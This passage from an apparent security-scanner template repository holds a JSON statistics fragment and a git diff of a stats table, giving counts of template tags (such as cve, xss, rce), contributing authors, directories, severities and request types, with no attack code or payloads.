nentwig","count":2},{"name":"koti2","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"random-robbie","count":2},{"name":"bsysop","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"unstabl3","count":2},{"name":"randomrobbie","count":2},{"name":"socketz","count":2},{"name":"sushantkamble","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"0xprial","count":2},{"name":"arcc","count":2},{"name":"0xcrypto","count":2},{"name":"convisoappsec","count":2},{"name":"kiblyn11","count":2},{"name":"hahwul","count":2},{"name":"nkxxkn","count":2},{"name":"0xrudra","count":2},{"name":"mohammedsaneem","count":2},{"name":"ehsahil","count":2},{"name":"0h1in9e","count":1},{"name":"sickwell","count":1},{"name":"ringo","count":1},{"name":"bernardofsr","count":1},{"name":"noamrathaus","count":1},{"name":"mah3sec_","count":1},{"name":"chron0x","count":1},{"name":"absshax","count":1},{"name":"juicypotato1","count":1},{"name":"ilovebinbash","count":1},{"name":"c3l3si4n","count":1},{"name":"ahmed sherif","count":1},{"name":"schniggie","count":1},{"name":"borna nematzadeh","count":1},{"name":"_harleo","count":1},{"name":"intx0x80","count":1},{"name":"j33n1k4","count":1},{"name":"alperenkesk","count":1},{"name":"willd96","count":1},{"name":"undefl0w","count":1},{"name":"cookiehanhoan","count":1},{"name":"@dwisiswant0","count":1},{"name":"remonsec","count":1},{"name":"akshansh","count":1},{"name":"aresx","count":1},{"name":"mhdsamx","count":1},{"name":"zhenwarx","count":1},{"name":"furkansenan","count":1},{"name":"52971","count":1},{"name":"kishore krishna 
(sillydaddy)","count":1},{"name":"sec_hawk","count":1},{"name":"kre80r","count":1},{"name":"me9187","count":1},{"name":"b0yd","count":1},{"name":"makyotox","count":1},{"name":"shifacyclewla","count":1},{"name":"th3.d1p4k","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sshell","count":1},{"name":"iampritam","count":1},{"name":"_c0wb0y_","count":1},{"name":"hanlaomo","count":1},{"name":"omarkurt","count":1},{"name":"rodnt","count":1},{"name":"berkdusunur","count":1},{"name":"evolutionsec","count":1},{"name":"nytr0gen","count":1},{"name":"affix","count":1},{"name":"b4uh0lz","count":1},{"name":"kabirsuda","count":1},{"name":"kurohost","count":1},{"name":"sullo","count":1},{"name":"knassar702","count":1},{"name":"geraldino2","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"thevillagehacker","count":1},{"name":"yashgoti","count":1},{"name":"philippdelteil","count":1},{"name":"bjhulst","count":1},{"name":"pdp","count":1},{"name":"smaranchand","count":1},{"name":"0ut0fb4nd","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"divya_mudgal","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"patralos","count":1},{"name":"jeya seelan","count":1},{"name":"notsoevilweasel","count":1},{"name":"jteles","count":1},{"name":"0xteles","count":1},{"name":"daviey","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mesaglio","count":1},{"name":"shelld3v","count":1},{"name":"dawid-czarnecki","count":1},{"name":"sy3omda","count":1},{"name":"alph4byt3","count":1},{"name":"ldionmarcil","count":1},{"name":"blckraven","count":1},{"name":"yavolo","count":1},{"name":"defr0ggy","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"mubassirpatel","count":1},{"name":"hakluke","count":1},{"name":"co0nan","count":1},{"name":"aaron_costello 
(@conspiracyproof)","count":1},{"name":"deena","count":1},{"name":"x6263","count":1},{"name":"raesene","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"adrianmf","count":1},{"name":"izn0u","count":1},{"name":"apt-mirror","count":1},{"name":"thezakman","count":1},{"name":"ooooooo_q","count":1},{"name":"andysvints","count":1},{"name":"luskabol","count":1},{"name":"petruknisme","count":1},{"name":"soyelmago","count":1},{"name":"retr0","count":1},{"name":"infosecsanyam","count":1},{"name":"its0x08","count":1},{"name":"elmahdi","count":1},{"name":"alex","count":1},{"name":"ahmetpergamum","count":1},{"name":"revblock","count":1},{"name":"becivells","count":1},{"name":"elder tao","count":1},{"name":"andirrahmani1","count":1},{"name":"bad5ect0r","count":1},{"name":"tirtha_mandal","count":1},{"name":"bolli95","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"shreyapohekar","count":1},{"name":"tim_koopmans","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"micha3lb3n","count":1},{"name":"yashanand155","count":1},{"name":"0xrod","count":1},{"name":"toufik 
airane","count":1},{"name":"mass0ma","count":1},{"name":"udyz","count":1},{"name":"qlkwej","count":1},{"name":"fmunozs","count":1},{"name":"0xtavian","count":1},{"name":"b0rn2r00t","count":1},{"name":"fopina","count":1},{"name":"gboddin","count":1},{"name":"exploitation","count":1},{"name":"zandros0","count":1},{"name":"push4d","count":1},{"name":"sicksec","count":1},{"name":"ipanda","count":1},{"name":"flag007","count":1},{"name":"akash.c","count":1},{"name":"wabafet","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"vzamanillo","count":1},{"name":"regala_","count":1},{"name":"ajaysenr","count":1},{"name":"naglinagli","count":1},{"name":"un-fmunozs","count":1},{"name":"taielab","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"s1r1u5_","count":1},{"name":"pratik khalane","count":1},{"name":"pudsec","count":1},{"name":"streetofhackerr007","count":1}],"directory":[{"name":"cves","count":696},{"name":"vulnerabilities","count":291},{"name":"exposed-panels","count":247},{"name":"exposures","count":186},{"name":"technologies","count":178},{"name":"misconfiguration","count":131},{"name":"takeovers","count":63},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":625},{"name":"high","count":540},{"name":"medium","count":428},{"name":"critical","count":267},{"name":"low","count":147}],"types":[{"name":"http","count":1904},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index a7efc05b55..4f95b9d14a 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md 
@@ -1,750 +1,799 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | pussycat0x | 55 | file | 46 | | | | | -| cve2021 | 112 | princechaddha | 55 | workflows | 35 | | | | | -| tech | 111 | gaurang | 42 | network | 30 | | | | | -| config | 93 | ice3man | 26 | miscellaneous | 24 | | | | | -| cve2019 | 90 | 0x_akoko | 25 | iot | 23 | | | | | -| cve2018 | 80 | organiccrap | 24 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 21 | fuzzing | 9 | | | | | -| apache | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | -| | 66 | milo2012 | 14 | headless | 5 | | | | | -| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 60 | techbrunchfr | 13 | | | | | | | -| joomla | 59 | suman_kar | 12 | | | | | | | -| iot | 58 | cyllective | 11 | | | | | | | -| cve2010 | 51 | r3dg33k | 11 | | | | | | | -| cve2017 | 49 | random_robbie | 10 | | | | | | | -| oob | 48 | righettod | 10 | | | | | | | -| file | 46 | wdahlenb | 9 | | | | | | | -| unauth | 45 | melbadry9 | 9 | | | | | | | -| network | 39 | nadino | 9 | | | | | | | -| sqli | 38 | hackergautam | 9 | | | | | | | -| ssrf | 35 | that_juan_ | 8 | | | | | | | -| cve2016 | 32 | aashiq | 8 | | | | | | | -| oracle | 31 | iamthefrogy 
| 8 | | | | | | | -| logs | 30 | kophjager007 | 7 | | | | | | | -| workflow | 30 | techryptic (@tech) | 7 | | | | | | | -| redirect | 28 | randomstr1ng | 7 | | | | | | | -| jira | 28 | dogasantos | 7 | | | | | | | -| atlassian | 27 | emadshanab | 7 | | | | | | | -| listing | 25 | dr_set | 7 | | | | | | | -| misc | 23 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 20 | harshbothra_ | 7 | | | | | | | -| disclosure | 20 | oppsec | 7 | | | | | | | -| cisco | 19 | meme-lord | 6 | | | | | | | -| generic | 19 | logicalhunter | 6 | | | | | | | -| aem | 19 | puzzlepeaches | 6 | | | | | | | -| router | 19 | caspergn | 6 | | | | | | | -| sap | 18 | __fazal | 6 | | | | | | | -| auth-bypass | 17 | ganofins | 5 | | | | | | | -| springboot | 16 | elsfa7110 | 5 | | | | | | | -| debug | 15 | yanyun | 5 | | | | | | | -| cve2014 | 15 | joanbono | 5 | | | | | | | -| misconfig | 14 | panch0r3d | 5 | | | | | | | -| cve2012 | 14 | rootxharsh | 5 | | | | | | | -| cve2011 | 13 | pentest_swissky | 5 | | | | | | | -| struts | 13 | iamnoooob | 5 | | | | | | | -| php | 13 | xelkomy | 4 | | | | | | | -| adobe | 13 | e_schultze_ | 4 | | | | | | | -| fuzz | 13 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | nodauf | 4 | | | | | | | -| weblogic | 12 | thomas_from_offensity | 3 | | | | | | | -| devops | 12 | impramodsargar | 3 | | | | | | | -| dlink | 12 | emenalf | 3 | | | | | | | -| dns | 12 | incogbyte | 3 | | | | | | | -| jenkins | 12 | 0w4ys | 3 | | | | | | | -| cve2013 | 11 | mavericknerd | 3 | | | | | | | -| zoho | 11 | shine | 3 | | | | | | | -| magento | 9 | f1tz | 3 | | | | | | | -| xxe | 9 | binaryfigments | 3 | | | | | | | -| ftp | 9 | fyoorer | 3 | | | | | | | -| aws | 9 | vsh00t | 3 | | | | | | | -| ruijie | 8 | lu4nx | 3 | | | | | | | -| scada | 8 | z3bd | 3 | | | | | | | -| login | 8 | dudez | 3 | | | | | | | -| cnvd | 8 | jarijaas | 3 | | | | | | | -| gitlab | 8 | shifacyclewala | 3 | | | | | | | -| airflow | 8 | tess | 3 | | | | | | | -| rails | 8 | _generic_human_ | 3 | | 
| | | | | -| cms | 7 | yash anand @yashanand155 | 3 | | | | | | | -| kubernetes | 7 | hahwul | 2 | | | | | | | -| nginx | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| netgear | 7 | swissky | 2 | | | | | | | -| cve2009 | 7 | 0xprial | 2 | | | | | | | -| files | 7 | w4cky_ | 2 | | | | | | | -| backup | 7 | 0xcrypto | 2 | | | | | | | -| coldfusion | 7 | 0xrudra | 2 | | | | | | | -| vmware | 7 | cocxanh | 2 | | | | | | | -| google | 6 | gal nagli | 2 | | | | | | | -| api | 6 | lotusdll | 2 | | | | | | | -| solr | 6 | koti2 | 2 | | | | | | | -| cve2008 | 6 | fabaff | 2 | | | | | | | -| django | 6 | pxmme1337 | 2 | | | | | | | -| dell | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | random-robbie | 2 | | | | | | | -| jetty | 6 | unstabl3 | 2 | | | | | | | -| docker | 6 | ree4pwn | 2 | | | | | | | -| laravel | 6 | johnjhacking | 2 | | | | | | | -| citrix | 6 | dheerajmadhukar | 2 | | | | | | | -| confluence | 6 | 0xsapra | 2 | | | | | | | -| windows | 5 | afaq | 2 | | | | | | | -| circarlife | 5 | foulenzer | 2 | | | | | | | -| drupal | 5 | 0xelkomy | 2 | | | | | | | -| headless | 5 | bp0lr | 2 | | | | | | | -| lucee | 5 | moritz nentwig | 2 | | | | | | | -| microsoft | 5 | arcc | 2 | | | | | | | -| fileupload | 5 | bsysop | 2 | | | | | | | -| java | 5 | hetroublemakr | 2 | | | | | | | -| nodejs | 5 | randomrobbie | 2 | | | | | | | -| ssti | 5 | huowuzhao | 2 | | | | | | | -| printer | 5 | nkxxkn | 2 | | | | | | | -| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | -| iis | 5 | socketz | 2 | | | | | | | -| wp-theme | 5 | davidmckennirey | 2 | | | | | | | -| dedecms | 5 | gevakun | 2 | | | | | | | -| ibm | 5 | joeldeleep | 2 | | | | | | | -| hongdian | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | mohammedsaneem | 2 | | | | | | | -| crlf | 4 | amsda | 2 | | | | | | | -| samsung | 4 | ehsahil | 2 | | | | | | | -| wso2 | 4 | whoever | 2 | | | | | | | -| solarwinds | 4 | bing0o | 2 | | | | | | | -| vpn | 4 | vavkamil | 2 | | | | | | | -| traversal | 4 | sushantkamble | 
2 | | | | | | | -| artifactory | 4 | r3naissance | 2 | | | | | | | -| deserialization | 4 | convisoappsec | 2 | | | | | | | -| tomcat | 4 | g4l1t0 | 2 | | | | | | | -| firmware | 4 | x1m_martijn | 2 | | | | | | | -| zimbra | 4 | alifathi-h1 | 2 | | | | | | | -| thinkphp | 4 | manas_harsh | 2 | | | | | | | -| jolokia | 4 | parth | 2 | | | | | | | -| glpi | 4 | kurohost | 1 | | | | | | | -| grafana | 4 | ldionmarcil | 1 | | | | | | | -| elastic | 4 | notsoevilweasel | 1 | | | | | | | -| exchange | 4 | luskabol | 1 | | | | | | | -| asp | 4 | c3l3si4n | 1 | | | | | | | -| buffalo | 4 | zandros0 | 1 | | | | | | | -| thinkcmf | 4 | udyz | 1 | | | | | | | -| hp | 4 | sickwell | 1 | | | | | | | -| symfony | 4 | b4uh0lz | 1 | | | | | | | -| webserver | 4 | akshansh | 1 | | | | | | | -| moodle | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| zhiyuan | 3 | deena | 1 | | | | | | | -| ebs | 3 | revblock | 1 | | | | | | | -| fpd | 3 | hanlaomo | 1 | | | | | | | -| lfr | 3 | mah3sec_ | 1 | | | | | | | -| resin | 3 | akash.c | 1 | | | | | | | -| caucho | 3 | defr0ggy | 1 | | | | | | | -| mongodb | 3 | elder tao | 1 | | | | | | | -| ofbiz | 3 | divya_mudgal | 1 | | | | | | | -| openssh | 3 | x6263 | 1 | | | | | | | -| fanruan | 3 | _c0wb0y_ | 1 | | | | | | | -| opensis | 3 | me9187 | 1 | | | | | | | -| git | 3 | @dwisiswant0 | 1 | | | | | | | -| amazon | 3 | ohlinge | 1 | | | | | | | -| oa | 3 | regala_ | 1 | | | | | | | -| terramaster | 3 | mass0ma | 1 | | | | | | | -| nacos | 3 | evolutionsec | 1 | | | | | | | -| nosqli | 3 | johnk3r | 1 | | | | | | | -| targa | 3 | co0nan | 1 | | | | | | | -| vbulletin | 3 | daviey | 1 | | | | | | | -| intrusive | 3 | berkdusunur | 1 | | | | | | | -| zabbix | 3 | 0xtavian | 1 | | | | | | | -| slack | 3 | th3.d1p4k | 1 | | | | | | | -| r-seenet | 3 | shifacyclewla | 1 | | | | | | | -| microstrategy | 3 | bjhulst | 1 | | | | | | | -| ssh | 3 | omarkurt | 1 | | | | | | | -| httpd | 3 | fmunozs | 1 | | | | | | | -| itop | 3 | mesaglio | 1 | | | | | | | 
-| log | 3 | sicksec | 1 | | | | | | | -| kevinlab | 3 | kabirsuda | 1 | | | | | | | -| kafka | 3 | iampritam | 1 | | | | | | | -| bitrix | 3 | _harleo | 1 | | | | | | | -| backups | 3 | ipanda | 1 | | | | | | | -| springcloud | 3 | sy3omda | 1 | | | | | | | -| nexus | 3 | aceseven (digisec360) | 1 | | | | | | | -| tikiwiki | 3 | bernardofsr | 1 | | | | | | | -| bypass | 3 | toufik airane | 1 | | | | | | | -| couchdb | 2 | yashanand155 | 1 | | | | | | | -| cve2005 | 2 | mubassirpatel | 1 | | | | | | | -| flir | 2 | streetofhackerr007 | 1 | | | | | | | -| natshell | 2 | ilovebinbash | 1 | | | | | | | -| mida | 2 | skeltavik | 1 | | | | | | | -| nagios | 2 | un-fmunozs | 1 | | | | | | | -| npm | 2 | 0ut0fb4nd | 1 | | | | | | | -| splunk | 2 | its0x08 | 1 | | | | | | | -| guacamole | 2 | zhenwarx | 1 | | | | | | | -| yapi | 2 | exploitation | 1 | | | | | | | -| maian | 2 | rtcms | 1 | | | | | | | -| waf | 2 | smaranchand | 1 | | | | | | | -| sonicwall | 2 | alperenkesk | 1 | | | | | | | -| cve2007 | 2 | thevillagehacker | 1 | | | | | | | -| jeedom | 2 | aresx | 1 | | | | | | | -| geowebserver | 2 | luci | 1 | | | | | | | -| status | 2 | adrianmf | 1 | | | | | | | -| plesk | 2 | knassar702 | 1 | | | | | | | -| prometheus | 2 | kre80r | 1 | | | | | | | -| globalprotect | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| seeyon | 2 | andysvints | 1 | | | | | | | -| keycloak | 2 | d0rkerdevil | 1 | | | | | | | -| frp | 2 | noamrathaus | 1 | | | | | | | -| telerik | 2 | pudsec | 1 | | | | | | | -| github | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| akkadian | 2 | 52971 | 1 | | | | | | | -| smb | 2 | yashgoti | 1 | | | | | | | -| prestashop | 2 | blckraven | 1 | | | | | | | -| chiyu | 2 | jteles | 1 | | | | | | | -| leak | 2 | nytr0gen | 1 | | | | | | | -| avantfax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| dolibarr | 2 | alph4byt3 | 1 | | | | | | | -| openfire | 2 | undefl0w | 1 | | | | | | | -| spark | 2 | vzamanillo 
| 1 | | | | | | | -| oauth | 2 | idealphase | 1 | | | | | | | -| ec2 | 2 | shelld3v | 1 | | | | | | | -| jboss | 2 | pratik khalane | 1 | | | | | | | -| rockethchat | 2 | sshell | 1 | | | | | | | -| node | 2 | cookiehanhoan | 1 | | | | | | | -| wordfence | 2 | kba@sogeti_esec | 1 | | | | | | | -| openam | 2 | retr0 | 1 | | | | | | | -| icewarp | 2 | _darrenmartyn | 1 | | | | | | | -| sharepoint | 2 | apt-mirror | 1 | | | | | | | -| mail | 2 | abison_binoy | 1 | | | | | | | -| axis2 | 2 | remonsec | 1 | | | | | | | -| proxy | 2 | 0xteles | 1 | | | | | | | -| grav | 2 | hakluke | 1 | | | | | | | -| rockmongo | 2 | alex | 1 | | | | | | | -| firebase | 2 | affix | 1 | | | | | | | -| saltstack | 2 | infosecsanyam | 1 | | | | | | | -| service | 2 | juicypotato1 | 1 | | | | | | | -| jellyfin | 2 | dawid-czarnecki | 1 | | | | | | | -| trixbox | 2 | @github.com/defr0ggy | 1 | | | | | | | -| odoo | 2 | 0xrod | 1 | | | | | | | -| azure | 2 | willd96 | 1 | | | | | | | -| pega | 2 | bad5ect0r | 1 | | | | | | | -| bigip | 2 | intx0x80 | 1 | | | | | | | -| injection | 2 | ajaysenr | 1 | | | | | | | -| dos | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| jsf | 2 | b0rn2r00t | 1 | | | | | | | -| middleware | 2 | rodnt | 1 | | | | | | | -| mcafee | 2 | sullo | 1 | | | | | | | -| ecology | 2 | naglinagli | 1 | | | | | | | -| glassfish | 2 | manuelbua | 1 | | | | | | | -| hpe | 2 | pdp | 1 | | | | | | | -| netis | 2 | patralos | 1 | | | | | | | -| rstudio | 2 | petruknisme | 1 | | | | | | | -| igs | 2 | chron0x | 1 | | | | | | | -| linkerd | 2 | flag007 | 1 | | | | | | | -| hoteldruid | 2 | mhdsamx | 1 | | | | | | | -| nextjs | 2 | ratnadip gajbhiye | 1 | | | | | | | -| axis | 2 | rojanrijal | 1 | | | | | | | -| voipmonitor | 2 | ahmed sherif | 1 | | | | | | | -| kibana | 2 | philippdelteil | 1 | | | | | | | -| phpcollab | 2 | micha3lb3n | 1 | | | | | | | -| backdoor | 2 | wabafet | 1 | | | | | | | -| paloalto | 2 | sid ahmed malaoui @ realistic | 1 
| | | | | | | -| | | security | | | | | | | | -| xxljob | 2 | shreyapohekar | 1 | | | | | | | -| vrealize | 2 | bolli95 | 1 | | | | | | | -| webcam | 2 | absshax | 1 | | | | | | | -| emerge | 2 | tirtha_mandal | 1 | | | | | | | -| hasura | 2 | 0h1in9e | 1 | | | | | | | -| shellshock | 2 | gboddin | 1 | | | | | | | -| strapi | 2 | yavolo | 1 | | | | | | | -| idrac | 2 | fopina | 1 | | | | | | | -| showdoc | 2 | makyotox | 1 | | | | | | | -| chamilo | 2 | tim_koopmans | 1 | | | | | | | -| horde | 2 | thezakman | 1 | | | | | | | -| hjtcloud | 2 | ringo | 1 | | | | | | | -| ucmdb | 2 | sec_hawk | 1 | | | | | | | -| akamai | 2 | furkansenan | 1 | | | | | | | -| kentico | 2 | qlkwej | 1 | | | | | | | -| smtp | 2 | whynotke | 1 | | | | | | | -| hashicorp | 2 | geraldino2 | 1 | | | | | | | -| activemq | 2 | taielab | 1 | | | | | | | -| huawei | 2 | jeya seelan | 1 | | | | | | | -| cache | 2 | soyelmago | 1 | | | | | | | -| sonarqube | 2 | elmahdi | 1 | | | | | | | -| fortios | 2 | s1r1u5_ | 1 | | | | | | | -| etouch | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| bash | 1 | becivells | 1 | | | | | | | -| 74cms | 1 | izn0u | 1 | | | | | | | -| smartblog | 1 | j33n1k4 | 1 | | | | | | | -| cloudflare | 1 | b0yd | 1 | | | | | | | -| api-manager | 1 | ooooooo_q | 1 | | | | | | | -| clink-office | 1 | raesene | 1 | | | | | | | -| codeigniter | 1 | kareemse1im | 1 | | | | | | | -| solarlog | 1 | borna nematzadeh | 1 | | | | | | | -| interlib | 1 | andirrahmani1 | 1 | | | | | | | -| primetek | 1 | schniggie | 1 | | | | | | | -| nexusdb | 1 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | andré monteiro | | | | | | | | -| | | @am0nt31r0 | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| prtg | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| spf | 1 | | | | | | | | 
| -| influxdb | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| phpfastcache | 1 | 
| | | | | | | | -| linksys | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| vidyo | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| linux | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| 
upnp | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| camera | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| 
